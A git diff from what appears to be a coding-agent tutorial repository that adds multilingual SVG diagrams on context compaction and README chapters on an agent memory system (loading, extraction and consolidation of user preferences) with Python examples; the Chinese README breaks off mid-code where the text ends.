a/s08_context_compact/images/layer1-budget.ja.svg b/s08_context_compact/images/layer1-budget.ja.svg new file mode 100644 index 000000000..b76862cbc --- /dev/null +++ b/s08_context_compact/images/layer1-budget.ja.svg @@ -0,0 +1,50 @@ + + + + + + + + + + + + + + L3: toolResultBudget — 大結果の永続化 + + + + ペインポイント + モデルが一度に 30 ファイルを読み込み、単一ターンの tool_result が合計 500KB に達し、コンテキストウィンドウを圧迫 + + + 圧縮前 + + tool_result: (78KB) ... + tool_result: (142KB) ... + tool_result: (290KB) ... + 合計 510KB → 予算超過 + + + + + + 圧縮後 + + tool_result: <persisted-output> + Full output: .task_outputs/t1.txt + Preview: (先頭 2000 文字) ... + 合計 18KB → 正常 + + + + 方法 + 1. 最終ターンの全 tool_result の合計サイズを集計 + 2. 200KB 超過 → サイズ順にソートし、最大のものから .task_outputs/tool-results/ に永続化 + 3. コンテキストには <persisted-output> マーカー + 先頭 2000 文字のプレビューのみ残す + + + + 結果:情報は失われていない(ディスクに完全なデータあり)、コンテキストは 510KB → ~18KB に削減、0 回 API 呼び出し + diff --git a/s08_context_compact/images/layer1-budget.svg b/s08_context_compact/images/layer1-budget.svg new file mode 100644 index 000000000..53f2d5c77 --- /dev/null +++ b/s08_context_compact/images/layer1-budget.svg @@ -0,0 +1,50 @@ + + + + + + + + + + + + + + L3: toolResultBudget — 大结果落盘 + + + + 痛点 + 模型一次读了 30 个文件,单轮 tool_result 加起来 500KB,直接把上下文窗口打满 + + + 压缩前 + + tool_result: (78KB) ... + tool_result: (142KB) ... + tool_result: (290KB) ... + 合计 510KB → 超预算 + + + + + + 压缩后 + + tool_result: <persisted-output> + Full output: .task_outputs/t1.txt + Preview: (前 2000 字符) ... + 合计 18KB → 正常 + + + + 怎么做 + 1. 统计最后一轮所有 tool_result 的总大小 + 2. 超过 200KB → 按大小排序,从最大的开始落盘到 .task_outputs/tool-results/ + 3. 上下文里只留 <persisted-output> 标记 + 前 2000 字符预览 + + + + 结果:信息没丢(磁盘有完整数据),上下文从 510KB 降到 ~18KB,0 次 API 调用 + diff --git a/s08_context_compact/images/micro-compact.en.svg b/s08_context_compact/images/micro-compact.en.svg new file mode 100644 index 000000000..51ed00825 --- /dev/null +++ b/s08_context_compact/images/micro-compact.en.svg @@ -0,0 +1,57 @@ + + + + + + + + + + + + + + L2: microCompact — Old Result Placeholder Replacement + + + + Pain Point + Agent read 10 files in a row; the full content of reads 1-7 is still sitting in context, taking space but no longer useful + + + Before (all 10 tool_result complete) + + + Read file A: (full content, 3200 chars)... + + Read file B: (full content, 1800 chars)... + + Read file C: (full content, 4500 chars)... + + Read file J: (full content, 2800 chars) + 7 old results waste ~25K chars + + + + + + After (keep only latest 3 complete) + + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + Read file J: (full content, 2800 chars) + Keep only latest 3; first 7 become placeholders + + + + How (teaching version) + Iterate through tool_result, keep only latest 3 complete, replace older ones with placeholders. + Real CC + Clears old results via API cache_edits (without breaking prompt cache prefix), only for COMPACTABLE_TOOLS: + Read, Bash, Grep, Glob, WebSearch, WebFetch, Edit, Write. Teaching version uses text placeholders to simulate the same effect. + diff --git a/s08_context_compact/images/micro-compact.ja.svg b/s08_context_compact/images/micro-compact.ja.svg new file mode 100644 index 000000000..5d8bff755 --- /dev/null +++ b/s08_context_compact/images/micro-compact.ja.svg @@ -0,0 +1,57 @@ + + + + + + + + + + + + + + L2: microCompact — 旧結果のプレースホルダー置換 + + + + ペインポイント + Agent が連続で 10 ファイルを読み込み、1〜7 回目の完全なファイル内容がコンテキストに残ったまま、場所を占有しつつ既に不要 + + + 圧縮前(10 件の tool_result がすべて完全) + + + Read file A: (完全な内容, 3200 文字)... + + Read file B: (完全な内容, 1800 文字)... + + Read file C: (完全な内容, 4500 文字)... + + Read file J: (完全な内容, 2800 文字) + 7 件の旧結果が ~25K 文字を無駄に占有 + + + + + + 圧縮後(最新 3 件のみ完全保持) + + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + Read file J: (完全な内容, 2800 文字) + 最新 3 件のみ保持、前 7 件はプレースホルダー化 + + + + 方法(教学版) + tool_result を走査し、最新 3 件のみ完全保持、古いものはプレースホルダーに置換。 + 実際の CC + API cache_edits で旧結果をクリア(prompt cache プレフィックスを破壊しない)、COMPACTABLE_TOOLS のみ対象: + Read, Bash, Grep, Glob, WebSearch, WebFetch, Edit, Write。教学版はテキストプレースホルダーで同様の効果を模擬。 + diff --git a/s08_context_compact/images/micro-compact.svg b/s08_context_compact/images/micro-compact.svg new file mode 100644 index 000000000..e1728f7d6 --- /dev/null +++ b/s08_context_compact/images/micro-compact.svg @@ -0,0 +1,57 @@ + + + + + + + + + + + + + + L2: microCompact — 旧结果占位替换 + + + + 痛点 + Agent 连续读了 10 个文件,第 1-7 次的完整文件内容还躺在上下文里,占着位置但早就没用了 + + + 压缩前(10 条 tool_result 全部完整) + + + Read file A: (完整内容, 3200 字符)... + + Read file B: (完整内容, 1800 字符)... + + Read file C: (完整内容, 4500 字符)... + + Read file J: (完整内容, 2800 字符) + 7 条旧结果白占 ~25K 字符 + + + + + + 压缩后(只保留最近 3 条完整) + + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + Read file J: (完整内容, 2800 字符) + 只保留最近 3 条,前 7 条变占位 + + + + 怎么做(教学版) + 遍历 tool_result,只保留最近 3 条完整,更旧的替换为占位符。 + 真实 CC + 通过 API cache_edits 清除旧结果(不破坏 prompt cache 前缀),仅对 COMPACTABLE_TOOLS 生效: + Read, Bash, Grep, Glob, WebSearch, WebFetch, Edit, Write。教学版用文本占位模拟同样效果。 + diff --git a/s09_memory/README.en.md b/s09_memory/README.en.md new file mode 100644 index 000000000..39cde9321 --- /dev/null +++ b/s09_memory/README.en.md @@ -0,0 +1,260 @@ +# s09: Memory — Remember What Matters, Forget What Doesn't + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s07 → s08 → `s09` → [s10](../s10_system_prompt/) → s11 → ... → s19 +> *"Remember what matters, forget what doesn't"* — Three subsystems: filter, extract, consolidate. +> +> **Harness Layer**: Memory — knowledge accumulation across compaction and sessions. + +--- + +## The Problem + +s08 gave the Agent the ability to compact context and run for a long time without crashing. But compaction is lossy. + +autoCompact preserves the current goal, remaining work, and constraints you mentioned in the summary — it's not total amnesia. But a summary is not a recording: your offhand remark "use tabs not spaces" might get simplified to "user has code style preferences," losing the specifics. **And when you start a new session, even the summary is gone.** + +Multiple compactions also cause cumulative drift — summaries of summaries, with details degrading like a JPEG recompressed over and over. + +**What's needed is a layer of stable memory that doesn't participate in summaries and persists across sessions — that's memory.** + +--- + +## The Solution + +![Memory Overview](images/memory-overview.en.svg) + +s08's compaction pipeline is fully preserved. The only change: inject relevant memories before each LLM call, extract new memories from the conversation after autoCompact, and periodically consolidate to deduplicate. + +Three subsystems, ordered by trigger timing: + +| Subsystem | Trigger Timing | What It Does | +|-----------|---------------|--------------| +| Loading | Before each LLM call | Filter relevant memories, inject into context | +| Extraction | After autoCompact | Auto-discover preferences, constraints, decisions from dialogue | +| Consolidation | Periodic / idle | Deduplicate, merge, prune outdated memories | + +Memory files are persisted on disk (`.memory/`), surviving across compactions and sessions. + +--- + +## How It Works + +![Memory Subsystems](images/memory-subsystems.en.svg) + +### Loading: Auto-load Relevant Memories + +Before each LLM call, the Agent needs to know what the user has said before — "use tabs not spaces," "prefer single quotes." But stuffing all memories into the context brings back the old system prompt bloat problem. + +Only filter memories **relevant** to the current conversation, capped at 5: + +```python +def load_memories(messages: list, max_items: int = 5) -> str: + """筛选与当前对话相关的记忆。""" + memories = read_all_memory_files() + if not memories: + return "" + + recent = extract_recent_user_messages(messages, n=3) + keywords = extract_keywords(recent) + + relevant = [] + for mem in memories: + if any(keyword in mem["content"].lower() + for keyword in keywords): + relevant.append(mem) + if len(relevant) >= max_items: + break + + return format_memories_for_context(relevant) +``` + +Keyword matching isn't precise enough — "indentation" might match "code indentation is 4 spaces" (the opposite of the user's preference). You need to truly "understand" the conversation content to discover new memories. → Extraction. + +### Extraction: Auto-discover New Memories + +Users don't say "remember this" every time. Preferences come out naturally — "I think tabs are better than spaces," "let's use single quotes from now on." The Agent needs to judge for itself: is there information worth remembering in this message? + +At the right moment (after autoCompact, since we're calling the LLM anyway), let the Agent analyze the recent conversation and extract preferences, constraints, decisions: + +```python +def extract_memories(messages: list): + """从最近对话中提取值得记住的信息,直接写文件。""" + recent = get_recent_conversation(messages, n=10) + + prompt = ( + "Extract user preferences, constraints, or decisions from this dialogue.\n" + "Return a JSON array. Each item: {content, type: preference|constraint|decision}.\n" + "If nothing new, return [].\n\n" + f"{recent}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=500, + ) + for mem in parse_memory_json(response.content[0].text): + mid = f"mem_{int(time.time())}_{abs(hash(mem['content'])) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +10 memories, 50, 200 — duplicates, contradictions, outdated ones. Need periodic consolidation. → Consolidation. + +### Consolidation: Periodic Cleanup + +Extraction appends a new file every time it discovers a memory. After two months, `.memory/` has 200 files — "use tabs" and "use spaces" coexist as contradictory memories, and the Agent doesn't know which to follow. + +Trigger Consolidation periodically — let the LLM deduplicate, merge, and prune outdated memories. CC calls this process **Dream** (an analogy to the brain organizing memories during sleep), running in the background when the Agent is idle: + +```python +CONSOLIDATE_THRESHOLD = 10 + +def consolidate_memories(): + """合并重复记忆,淘汰过时记忆。""" + memories = read_all_memory_files() + + if len(memories) < CONSOLIDATE_THRESHOLD: + return # 太少,不值得整理 + + prompt = ( + "Consolidate the following memories. Rules:\n" + "1. Merge duplicates into one concise memory\n" + "2. Remove outdated/contradicted memories\n" + "3. Keep the total under 50 memories\n" + "4. Preserve important user preferences above all\n\n" + f"{json.dumps(memories, indent=2)}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=2000, + ) + consolidated = json.loads(response.content[0].text.strip()) + # 清空旧记忆,写入合并后的 + for f in MEMORY_DIR.glob("mem_*.json"): + f.unlink() + for mem in consolidated: + mid = f"mem_{int(time.time())}_{abs(hash(mem.get('content', ''))) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +--- + +## Changes From s08 + +| Component | Before (s08) | After (s09) | +|-----------|-------------|------------| +| Memory capability | None (preferences degrade with compaction summaries) | Loading + Extraction + Consolidation subsystems | +| New functions | — | load_memories, extract_memories, consolidate_memories, read_all_memory_files | +| Storage | — | .memory/mem_*.json cross-session persistence | +| Tools | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | bash, read_file, write_file (3) — focused on memory demo | +| Loop | Only compaction each round | Inject relevant memories each round + extract new memories after autoCompact + periodic consolidation | + +--- + +## Try It + +```sh +cd learn-claude-code +python s09_memory/code.py +``` + +Try these prompts (enter across multiple rounds, observe memory accumulation and loading): + +1. `I prefer using tabs for indentation, not spaces. Remember that.` +2. `Create a Python file called test.py` (observe whether the Agent uses tabs) +3. `What did I tell you about my preferences?` (observe whether the Agent remembers) +4. `I also prefer single quotes over double quotes for strings.` + +What to watch for: After multiple rounds, do memory files appear in the `.memory/` directory? When starting a new conversation, does the Agent auto-load previous memories? + +--- + +## What's Next + +Now we have memory, tools, and compaction. But the system prompt is still a hardcoded monolithic string — "You are a coding agent, your tools are bash, read, write...". + +Add a new tool to the Agent, and you have to manually add a description to the system prompt. Switch projects, and the entire system prompt needs rewriting. The prompt should be **assembled at runtime**, like Lego — different scenarios, different bricks. + +s10 System Prompt → segmented + runtime assembly. Different projects, different users, different tools — assemble different prompts. + +
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `extractMemories.ts` (615 lines), `sessionMemory.ts` (495 lines), `memoryTypes.ts`, `findRelevantMemories.ts`, and `autoDream/`. + +### 1. MemorySelector: Uses LLM Selection, Not Embedding + +The teaching version says "CC uses embedding vector similarity" — **this is wrong**. CC actually uses **Sonnet itself to select** (`findRelevantMemories.ts`): + +1. Lists all memory files' `name` + `description` (extracted from YAML frontmatter) as a catalog +2. Sends the catalog to Sonnet: "Based on name and description, select truly useful memories (max 5). If unsure, don't select." +3. Sonnet returns `{ selected_memories: ["file1.md", ...] }` +4. Full content of selected files is read (max 200 lines / 4096 bytes per file) and injected into context + +This means memory selection is itself an LLM call — but it's a lightweight Sonnet side-query that doesn't block the main flow. + +### 2. ExtractMemories: Triggered in Stop Hook, Runs Every Turn + +Trigger timing (`stopHooks.ts:141-152`): +- Inside `handleStopHooks()` — when the model stops with no tool_use +- **Not** after autoCompact (the teaching version simplifies this) +- Runs every N turns (default N=1, i.e., every turn) +- Has overlap protection: if the main Agent already wrote a memory file, skip + +### 3. Memory File Format: Markdown + YAML Frontmatter, Not JSON + +The teaching version uses JSON for storage. CC actually uses **Markdown files + YAML frontmatter** (`memoryTypes.ts:261-271`): + +```markdown +--- +name: user_preference_tabs +description: User prefers tabs for indentation +type: user +--- + +User prefers using tabs, not spaces, for indentation in all projects. +**Why:** Consistency with existing codebase conventions. +**How to apply:** Always use tabs when writing or editing Python files. +``` + +Four types: `user` (user preferences), `feedback` (feedback guidance), `project` (project facts), `reference` (external references). + +The memory index file `MEMORY.md` is one link per line: `- [Title](file.md) — one-line hook`. Max 200 lines / 25KB. + +Storage location: `~/.claude/projects//memory/` + +### 4. DreamConsolidator: Three-Layer Gate Control + +Not "triggered when idle," but three-layer gating (`autoDream.ts`): + +1. **Time gate** (cheapest): ≥ 24 hours since last consolidation +2. **Session gate**: ≥ 5 session transcripts modified since last consolidation +3. **Lock gate**: no other process currently doing consolidation (`.consolidate-lock` file) + +The merge algorithm itself is **yet another forked agent call** — four-phase prompt: locate → collect recent signals → merge and write files → prune and update index. Lock file mtime is the lastConsolidatedAt. Crash recovery: lock auto-expires after 1 hour, next process reclaims. + +### 5. Session Memory vs User Memory + +| | User Memory | Session Memory | +|---|---|---| +| Persistence | Cross-session | Single session | +| Storage | Multiple .md files under `memory/` | Single file `session-memory//memory.md` | +| Loaded into | system prompt | compact summary | +| Purpose | Cross-session knowledge accumulation | Cross-compact context continuity | + +sessionMemoryCompact (the mechanism mentioned in s08) is exactly what uses Session Memory — before autoCompact, read the session memory file first; if there's enough content (≥ 10K tokens, ≥ 5 text messages, ≤ 40K tokens), use it for summarization without calling the LLM. + +### The Teaching Version's Simplifications Are Intentional + +- LLM selection → keyword matching: the teaching version can't rely on an extra Sonnet side-query +- Memory JSON → Markdown frontmatter: the teaching version uses JSON for simplicity +- Stop hook trigger → after-autoCompact trigger: conceptually more coherent ("extract memories while compressing") +- Three-layer gating → simple count threshold: the teaching version has no transcript system or multi-session concept + +
+ + diff --git a/s09_memory/README.ja.md b/s09_memory/README.ja.md new file mode 100644 index 000000000..b6b10434e --- /dev/null +++ b/s09_memory/README.ja.md @@ -0,0 +1,260 @@ +# s09: Memory — 覚えるべきは覚え、忘れるべきは忘れる + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s07 → s08 → `s09` → [s10](../s10_system_prompt/) → s11 → ... → s19 +> *"Remember what matters, forget what doesn't"* — 3つのサブシステム:フィルタ、抽出、整理。 +> +> **Harness レイヤー**: メモリ — 圧縮やセッションをまたぐ知識の蓄積。 + +--- + +## 課題 + +s08 により、Agent はコンテキストを圧縮し、長時間クラッシュせずに動作できるようになりました。しかし、圧縮は損失を伴います。 + +autoCompact は現在の目標、残りの作業、ユーザーが述べた制約をサマリに保持します — 完全な健忘ではありません。しかし、サマリは録音ではありません:「タブを使って、スペースは使わないで」という何気ない一言が、「ユーザーにはコードスタイルの好みがある」と簡略化され、詳細が失われる可能性があります。**さらに、新しいセッションを開始すると、サマリすら消えてしまいます。** + +複数回の圧縮により、累積的なドリフトも発生します — サマリのサマリ、詳細は JPEG の再圧縮のように劣化していきます。 + +**サマリに参加せず、セッションをまたいで保持される安定したメモリ層が必要 — それが memory です。** + +--- + +## ソリューション + +![Memory Overview](images/memory-overview.ja.svg) + +s08 の圧縮パイプラインは完全に維持されます。唯一の変更点:各 LLM 呼び出し前に関連メモリを注入し、autoCompact 後に会話から新しいメモリを抽出し、定期的に統合して重複を排除します。 + +3つのサブシステム、トリガータイミング順: + +| サブシステム | トリガータイミング | 動作 | +|-------------|------------------|------| +| Loading | 各 LLM 呼び出し前 | 関連メモリをフィルタ、コンテキストに注入 | +| Extraction | autoCompact 後 | 会話から好み、制約、決定を自動発見 | +| Consolidation | 定期 / アイドル時 | 重複排除、統合、古いメモリを整理 | + +メモリファイルはディスク上(`.memory/`)に永続化され、圧縮やセッションをまたいで保持されます。 + +--- + +## 仕組み + +![Memory Subsystems](images/memory-subsystems.ja.svg) + +### Loading: 関連メモリの自動読み込み + +各 LLM 呼び出し前、Agent はユーザーが以前何を言ったかを知る必要があります — 「タブを使ってスペースは使わない」「シングルクォートが好み」など。しかし、すべてのメモリをコンテキストに詰め込むと、system prompt 膨張の古い問題に戻ってしまいます。 + +現在の会話に**関連する**メモリだけをフィルタし、5件までに制限します: + +```python +def load_memories(messages: list, max_items: int = 5) -> str: + """筛选与当前对话相关的记忆。""" + memories = read_all_memory_files() + if not memories: + return "" + + recent = extract_recent_user_messages(messages, n=3) + keywords = extract_keywords(recent) + + relevant = [] + for mem in memories: + if any(keyword in mem["content"].lower() + for keyword in keywords): + relevant.append(mem) + if len(relevant) >= max_items: + break + + return format_memories_for_context(relevant) +``` + +キーワードマッチングは十分に正確ではありません — 「インデント」が「コードのインデントは4スペース」(ユーザーの好みの逆)にマッチする可能性があります。会話の内容を真に「理解」して新しいメモリを発見する必要があります。→ Extraction。 + +### Extraction: 新しいメモリの自動発見 + +ユーザーは毎回「これを覚えて」とは言いません。好みは自然に表れます — 「タブの方がスペースよりいいと思う」「これからはシングルクォートを使おう」など。Agent 自身が判断する必要があります:この発言に記憶すべき情報があるか? + +適切なタイミング(autoCompact 後、どうせ LLM を呼ぶので)で、Agent に最近の会話を分析させ、好み、制約、決定を抽出します: + +```python +def extract_memories(messages: list): + """从最近对话中提取值得记住的信息,直接写文件。""" + recent = get_recent_conversation(messages, n=10) + + prompt = ( + "Extract user preferences, constraints, or decisions from this dialogue.\n" + "Return a JSON array. Each item: {content, type: preference|constraint|decision}.\n" + "If nothing new, return [].\n\n" + f"{recent}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=500, + ) + for mem in parse_memory_json(response.content[0].text): + mid = f"mem_{int(time.time())}_{abs(hash(mem['content'])) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +10件、50件、200件のメモリ — 重複、矛盾、古い情報。定期的な統合が必要です。→ Consolidation。 + +### Consolidation: 定期的な整理 + +Extraction は新しいメモリを発見するたびにファイルを追加で書き込みます。2ヶ月後には `.memory/` に200個のファイルがあり — 「タブを使う」と「スペースを使う」という矛盾するメモリが共存し、Agent はどちらに従うべきか分かりません。 + +定期的に Consolidation をトリガー — LLM に重複排除、統合、古いメモリの整理を行わせます。CC はこのプロセスを **Dream**(睡眠中に脳が記憶を整理する analogy)と呼び、Agent のアイドル時にバックグラウンドで実行します: + +```python +CONSOLIDATE_THRESHOLD = 10 + +def consolidate_memories(): + """合并重复记忆,淘汰过时记忆。""" + memories = read_all_memory_files() + + if len(memories) < CONSOLIDATE_THRESHOLD: + return # 太少,不值得整理 + + prompt = ( + "Consolidate the following memories. Rules:\n" + "1. Merge duplicates into one concise memory\n" + "2. Remove outdated/contradicted memories\n" + "3. Keep the total under 50 memories\n" + "4. Preserve important user preferences above all\n\n" + f"{json.dumps(memories, indent=2)}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=2000, + ) + consolidated = json.loads(response.content[0].text.strip()) + # 清空旧记忆,写入合并后的 + for f in MEMORY_DIR.glob("mem_*.json"): + f.unlink() + for mem in consolidated: + mid = f"mem_{int(time.time())}_{abs(hash(mem.get('content', ''))) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +--- + +## s08 からの変更点 + +| コンポーネント | 変更前 (s08) | 変更後 (s09) | +|--------------|-------------|-------------| +| メモリ機能 | なし(圧縮サマリで好みが劣化) | Loading + Extraction + Consolidation サブシステム | +| 新規関数 | — | load_memories, extract_memories, consolidate_memories, read_all_memory_files | +| ストレージ | — | .memory/mem_*.json クロスセッション永続化 | +| ツール | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | bash, read_file, write_file (3) — メモリデモに集中 | +| ループ | 各ラウンドで圧縮のみ | 各ラウンドで関連メモリ注入 + autoCompact 後に新規メモリ抽出 + 定期的に統合 | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s09_memory/code.py +``` + +以下のプロンプトを試してください(複数ラウンドに分けて入力し、メモリの蓄積と読み込みを観察): + +1. `I prefer using tabs for indentation, not spaces. Remember that.` +2. `Create a Python file called test.py`(Agent がタブを使用するか観察) +3. `What did I tell you about my preferences?`(Agent が覚えているか観察) +4. `I also prefer single quotes over double quotes for strings.` + +観察のポイント:複数ラウンドの後、`.memory/` ディレクトリにメモリファイルが生成されているか? 新しいセッション開始時、Agent が以前のメモリを自動的に読み込んでいるか? + +--- + +## 次へ + +メモリ、ツール、圧縮が揃いました。しかし、system prompt はまだハードコードされた大きな文字列です — 「あなたは coding agent です。ツールは bash、read、write...」。 + +Agent に新しいツールを追加するには、system prompt に手動で説明を追加する必要があります。プロジェクトを変えれば、system prompt 全体を書き直す必要があります。prompt は**実行時に組み立てられる**べきです — レゴのように、異なるシナリオで異なるブロックを組み合わせる。 + +s10 System Prompt → セグメント化 + 実行時アセンブリ。異なるプロジェクト、異なるユーザー、異なるツール — 異なる prompt を組み立てる。 + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `extractMemories.ts`(615 行)、`sessionMemory.ts`(495 行)、`memoryTypes.ts`、`findRelevantMemories.ts`、`autoDream/` の完全分析に基づく。 + +### 一、MemorySelector:embedding ではなく LLM で選択 + +教育版では「CC は embedding ベクトル類似度を使う」と言っています — **これは間違いです**。CC は実際に **Sonnet 自体を使用して選択**しています(`findRelevantMemories.ts`): + +1. すべてのメモリファイルの `name` + `description`(YAML frontmatter から抽出)をカタログとしてリスト +2. カタログを Sonnet に送信:「名前と説明に基づいて、本当に有用なメモリを選択(最大5件)。不明な場合は選択しない。」 +3. Sonnet は `{ selected_memories: ["file1.md", ...] }` を返す +4. 選択されたファイルの完全な内容が読み込まれ(最大 200 行 / 4096 バイト / ファイル)、コンテキストに注入 + +つまり、メモリ選択自体が LLM 呼び出しです — ただし軽量な Sonnet side-query であり、メインフローをブロックしません。 + +### 二、ExtractMemories:stop hook でトリガー、毎ターン実行 + +トリガータイミング(`stopHooks.ts:141-152`): +- `handleStopHooks()` 内 — モデルが停止し、tool_use がないとき +- autoCompact 後では**ない**(教育版はこれを簡略化している) +- N ターンごとに実行(デフォルト N=1、つまり毎ターン) +- 重複保護あり:メイン Agent が既にメモリファイルを書き込んでいる場合はスキップ + +### 三、メモリファイル形式:JSON ではなく Markdown + YAML frontmatter + +教育版は JSON でメモリを保存します。CC は実際に **Markdown ファイル + YAML frontmatter** を使用します(`memoryTypes.ts:261-271`): + +```markdown +--- +name: user_preference_tabs +description: User prefers tabs for indentation +type: user +--- + +User prefers using tabs, not spaces, for indentation in all projects. +**Why:** Consistency with existing codebase conventions. +**How to apply:** Always use tabs when writing or editing Python files. +``` + +4つのタイプ:`user`(ユーザーの好み)、`feedback`(フィードバック指導)、`project`(プロジェクト事実)、`reference`(外部参照)。 + +メモリインデックスファイル `MEMORY.md` は1行に1リンク:`- [Title](file.md) — one-line hook`。最大 200 行 / 25KB。 + +保存場所:`~/.claude/projects//memory/` + +### 四、DreamConsolidator:三層ゲート制御 + +「アイドル時にトリガー」ではなく、三層ゲーティング(`autoDream.ts`): + +1. **時間ゲート**(最も安価):前回の統合から ≥ 24 時間経過 +2. **セッションゲート**:前回の統合以降に ≥ 5 セッションの transcript が変更された +3. **ロックゲート**:他のプロセスが統合を実行中ではない(`.consolidate-lock` ファイル) + +マージアルゴリズム自体は**さらに別の forked agent 呼び出し** — 4フェーズのプロンプト:位置特定 → 最近のシグナル収集 → 統合してファイル書き込み → 剪定してインデックス更新。ロックファイルの mtime が lastConsolidatedAt。クラッシュリカバリ:1時間後にロックが自動期限切れ、次のプロセスが引き継ぎ。 + +### 五、Session Memory と User Memory + +| | User Memory | Session Memory | +|---|---|---| +| 永続性 | クロスセッション | 単一セッション | +| ストレージ | `memory/` 下の複数 .md ファイル | `session-memory//memory.md` 単一ファイル | +| 読み込み先 | system prompt | compact サマリ | +| 用途 | クロスセッションの知識蓄積 | クロス compact のコンテキスト連続性 | + +sessionMemoryCompact(s08 で言及された仕組み)はまさに Session Memory を使用しています — autoCompact の前に session memory ファイルを先に読み込み、十分な内容があれば(≥ 10K トークン、≥ 5 テキストメッセージ、≤ 40K トークン)、LLM を呼ばずにそれを使ってサマリを作成します。 + +### 教育版の簡略化は意図的 + +- LLM 選択 → キーワードマッチング:教育版は追加の Sonnet side-query に依存できない +- メモリ JSON → Markdown frontmatter:教育版はシンプルさのために JSON を使用 +- stop hook トリガー → autoCompact 後トリガー:概念的により一貫性がある(「圧縮と一緒にメモリを抽出」) +- 三層ゲーティング → 単純なカウント閾値:教育版には transcript システムやマルチセッションの概念がない + +
+ + diff --git a/s09_memory/README.md b/s09_memory/README.md new file mode 100644 index 000000000..064ec6d75 --- /dev/null +++ b/s09_memory/README.md @@ -0,0 +1,260 @@ +# s09: Memory — 记住该记住的,忘掉该忘掉的 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s07 → s08 → `s09` → [s10](../s10_system_prompt/) → s11 → ... → s19 +> *"记住该记的, 忘掉该忘的"* — 三个子系统: 筛选、提取、整理。 +> +> **Harness 层**: 记忆 — 跨压缩、跨会话的知识积累。 + +--- + +## 问题 + +s08 让 Agent 能压缩上下文、跑很久不崩。但压缩是有损的。 + +autoCompact 会把当前目标、剩余工作、你提过的约束写进摘要保留下来——不是完全失忆。但摘要不是录音:你随口说的"用 tab 缩进不要用空格",可能被摘要简化成"用户有代码风格偏好",丢了细节。**而且新开一个会话,连摘要也没了。** + +多次压缩后还会累积漂移——摘要的摘要,细节像 JPEG 反复压缩一样退化。 + +**需要一层不参与摘要、跨会话保留的稳定记忆——这就是 memory。** + +--- + +## 解决方案 + +![Memory Overview](images/memory-overview.svg) + +s08 的压缩管线完全保留。唯一的变动:每轮 LLM 调用前注入相关记忆,autoCompact 后从对话中提取新记忆,定期整理去重。 + +三个子系统,按触发时机排列: + +| 子系统 | 触发时机 | 做什么 | +|--------|---------|--------| +| Loading | 每轮 LLM 调用前 | 筛选相关记忆,注入上下文 | +| Extraction | autoCompact 后 | 从对话中自动发现偏好、约束、决策 | +| Consolidation | 定期 / 空闲时 | 去重、合并、淘汰过时记忆 | + +记忆文件持久化在磁盘上(`.memory/`),跨压缩、跨会话。 + +--- + +## 工作原理 + +![Memory Subsystems](images/memory-subsystems.svg) + +### Loading: 自动加载相关记忆 + +每轮 LLM 调用前,Agent 需要知道用户之前说过什么——"用 tab 不用空格"、"偏好单引号"。但如果把全部记忆塞进上下文,等于回到了 system prompt 膨胀的老路。 + +只筛选与当前对话**相关的**记忆,控制在 5 条以内: + +```python +def load_memories(messages: list, max_items: int = 5) -> str: + """筛选与当前对话相关的记忆。""" + memories = read_all_memory_files() + if not memories: + return "" + + recent = extract_recent_user_messages(messages, n=3) + keywords = extract_keywords(recent) + + relevant = [] + for mem in memories: + if any(keyword in mem["content"].lower() + for keyword in keywords): + relevant.append(mem) + if len(relevant) >= max_items: + break + + return format_memories_for_context(relevant) +``` + +关键词匹配不够精确——"缩进"可能匹配到"代码缩进是 4 空格"(用户偏好的反面)。需要真的"理解"对话内容才能发现新记忆。→ Extraction。 + +### Extraction: 自动发现新记忆 + +用户不会每次都说"记住这个"。偏好是自然流露的——"我觉得 tab 比空格好"、"以后都用单引号吧"。Agent 需要自己判断:这句话里有没有值得记下来的信息? + +在合适的时机(autoCompact 之后,反正要调 LLM),让 Agent 分析最近对话,提取偏好、约束、决策: + +```python +def extract_memories(messages: list): + """从最近对话中提取值得记住的信息,直接写文件。""" + recent = get_recent_conversation(messages, n=10) + + prompt = ( + "Extract user preferences, constraints, or decisions from this dialogue.\n" + "Return a JSON array. Each item: {content, type: preference|constraint|decision}.\n" + "If nothing new, return [].\n\n" + f"{recent}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=500, + ) + for mem in parse_memory_json(response.content[0].text): + mid = f"mem_{int(time.time())}_{abs(hash(mem['content'])) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +记忆 10 条、50 条、200 条——重复的、矛盾的、过时的。需要定期整理。→ Consolidation。 + +### Consolidation: 定期整理 + +Extraction 每次发现新记忆就追加写文件。两个月后 `.memory/` 下有 200 个文件——"用 tab"和"用空格"两个矛盾的记忆同时存在,Agent 不知道该听哪个。 + +定期触发 Consolidation——让 LLM 去重、合并、淘汰过时记忆。CC 把这个过程叫 **Dream**(借喻睡眠时大脑整理记忆),在 Agent 空闲时后台运行: + +```python +CONSOLIDATE_THRESHOLD = 10 + +def consolidate_memories(): + """合并重复记忆,淘汰过时记忆。""" + memories = read_all_memory_files() + + if len(memories) < 